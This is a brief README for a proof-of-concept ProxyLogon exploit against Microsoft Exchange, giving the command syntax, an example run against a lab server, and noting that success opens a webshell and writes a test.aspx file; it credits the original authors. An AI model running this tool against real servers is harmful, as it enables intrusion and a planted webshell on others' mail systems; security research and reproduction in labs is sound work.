PoC Exploit for Microsoft Exchange Launche
Original PoC: https://github.com/testanull
python proxylogon.py <name or IP of server> <user@fqdn>
Example:
python proxylogon.py primary administrator@lab.local
If successful you will be dropped into a webshell. exit
or quit
to escape from the webshell (or ctrl+c)
By default, it will create a file test.aspx
. This can be changed.
@Flangvik @Testanull https://www.praetorian.com/blog/reproducing-proxylogon-exploit/